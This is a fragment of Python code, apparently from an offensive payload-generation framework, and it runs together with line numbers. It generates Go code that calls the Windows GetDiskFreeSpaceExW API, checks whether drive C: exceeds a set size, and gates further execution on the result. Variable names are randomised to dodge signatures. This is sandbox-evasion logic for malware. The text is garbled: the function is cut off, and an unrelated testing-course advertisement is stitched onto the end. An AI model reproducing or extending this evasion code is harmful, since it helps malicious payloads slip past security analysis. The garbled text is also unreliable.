'x':844            min_disk_size = evasion_helpers.randomString()845            kernel32 = evasion_helpers.randomString()846            getDiskFreeSpaceEx = evasion_helpers.randomString()847            lpFreeBytesAvailable = evasion_helpers.randomString()848            lpTotalNumberOfBytes = evasion_helpers.randomString()849            lpTotalNumberOfFreeBytes = evasion_helpers.randomString()850            cur_disk_size = evasion_helpers.randomString()851            check_code += min_disk_size + ' := float32(' + evasion_payload.required_options["DISKSIZE"][0] + ')\n'852            check_code += 'var ' + kernel32 + ' = syscall.NewLazyDLL("kernel32.dll")\n'853            check_code += 'var ' + getDiskFreeSpaceEx + ' = ' + kernel32 + '.NewProc("GetDiskFreeSpaceExW")\n'854            check_code += lpFreeBytesAvailable + ' := int64(0)\n'855            check_code += '\t' + lpTotalNumberOfBytes + ' := int64(0)\n'856            check_code += '\t' + lpTotalNumberOfFreeBytes + ' := int64(0)\n'857            check_code += getDiskFreeSpaceEx + '.Call(\n'858            check_code += '\tuintptr(unsafe.Pointer(syscall.StringToUTF16Ptr("C:"))),\n'859            check_code += '\tuintptr(unsafe.Pointer(&' + lpFreeBytesAvailable + ')),\n'860            check_code += '\tuintptr(unsafe.Pointer(&' + lpTotalNumberOfBytes + ')),\n'861            check_code += '\tuintptr(unsafe.Pointer(&' + lpTotalNumberOfFreeBytes + ')))\n'862            check_code += cur_disk_size + ' := float32(' + lpTotalNumberOfBytes + ')/1073741824\n'863            check_code += 'if (' + cur_disk_size + ' > ' + min_disk_size + ') {\n'864            num_tabs_required += 1865        # Return check information866        return check_code, num_tabs_required867    else:...Learn to execute automation testing from scratch with LambdaTest Learning Hub. Right from setting up the prerequisites to run your first automation test, to following best practices and diving deeper into advanced test scenarios. 
